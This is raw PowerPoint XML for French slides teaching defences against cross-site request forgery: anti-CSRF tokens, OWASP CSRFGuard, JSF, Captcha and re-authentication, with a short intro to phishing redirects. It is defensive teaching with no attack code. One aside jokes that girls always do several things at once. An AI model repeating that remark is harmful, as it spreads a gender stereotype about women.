              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="252525"/>
                </a:solidFill>
              </a:rPr>
              <a:t>L’objectif de cette faille étant que l'utilisateur vulnérable (Alice) l'exécute cette action</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="252525"/>
                </a:solidFill>
              </a:rPr>
              <a:t> avec ses propres droits </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="252525"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sans en avoir conscience </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>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91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Par exemple, supposons qu'Alice soit connectée sur le site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="144000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>A côté de cela elle navigue sur internet (onsais bien que les filles font toujours plusieures choses à la fois) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="144000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Sur ce site pirate il y a une image cachée avec URL qui change le prix (ce type d’action n’est accessible que pas un utilisateur authentifié)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="144000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>L’url est jouée avec le </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1200" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>contexte courant </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>d’Alice sur le site de base</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Pour éviter cela, il faut </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’assurer que c’est un humain qui exécute l’action</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>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20000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Premier moyen de prévention : le jeton, la fameuse methode “VerifierTocken” qu’on appelle un peu partout…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Le jeton est utilisé</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> en complément ou à la place d'un</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>mot de passe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> pour prouver que le client est bien celui qu'il prétend être.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>L’algorithme de génération ne doit pas être une simple incrémentation, il doit être réfléchi : pas de notion temporelle, pas d’information sur l’utilisateur, pas de suite. Il ne doit pas être prévisible.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attaquant incapable de prédire le prochain jeton</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Un par session ou 1 par formulaire (dans un champc caché)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Envoyé dans </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>session HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t> d’Alice et doit être envoyé à chaque fois qu’on lance une requete sur le site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(token pas dans les </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cookies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> plus de risque de vol)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Tout le mecanisme géré nativement par des framework</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Solutions : </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-298450" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JSF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="252525"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>JavaServer Faces</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="252525"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t> est un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0B0080"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>framework</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="252525"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0B0080"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>Java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bibliothèque de balises)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-298450" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CSRFGuard (bibliotheque pour inserer des jetons OWASP)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="152727"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buSzPct val="122222"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="362B36"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F2F5F7"/>
                </a:highlight>
              </a:rPr>
              <a:t>OWASP CSRFGuard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="362B36"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F2F5F7"/>
                </a:highlight>
              </a:rPr>
              <a:t> provides:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1600200" lvl="0" indent="-228600" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="362B36"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="362B36"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F2F5F7"/>
                </a:highlight>
              </a:rPr>
              <a:t>A library that implements a variant of the synchronizer token pattern to mitigate the risk of Cross-Site Request Forgery (CSRF) attacks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1600200" lvl="0" indent="-228600" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="362B36"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="362B36"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F2F5F7"/>
                </a:highlight>
              </a:rPr>
              <a:t>A JavaEE Filter and exposes various automated and manual ways to integrate per-session or pseudo-per-request tokens into HTML.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr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800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Un par session ou par formulaire à envoyer (par action) : libre</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Si par session : Création au moment de l’authentification &amp; Régénérer le Token après plusieurs X utilisations ou X min ou si on détecte une intrusion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Si par formulaire : Identifier les formulaires à protéger &amp; génrer le token dans le session HTTP &amp; le cacher dans un champ (exemple en JS) et non pas dans l’URL &amp; l’ajouter dans l’appel à l’action (JS avant l’appel à l’action au clic sur le bouton de validation : discretion. Contrairement à l’appel direct de l’action qui ne passe pas par ce JS qui ajoute le token en paramètre de l’appel)</a:t>
            </a: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91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1200" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Renforcer les vérification physique (qui assure que c’est bien un humain qui se trouve devant le site)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Le célèbre Captcha :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>S’assurer que c’est un humain qui execute l’action</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> surtout utile pour la création de compte intempestive par des robots.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Surauthentification : pas forcement la page d’authent mais une action qui prouve que c’est bien Alice qui est à l’origine de la requête. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(ex site de banque URL qui permet de faire un virement avec param n° compte et une somme </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pour s’assurer que c’est bien la personne détentrice du compte qui exécute l’action : sms banque virement) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="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a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1200">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a:t>Maintenant qu’on sait que c’est bien Alice qui exécute </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" b="1"/>
              <a:t>volontairement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t> les actions sur le site.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t>Il faut s’assurer qu’elle y reste et qu’elle ne soit pas redirigée vers un site malveillant de phishing </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
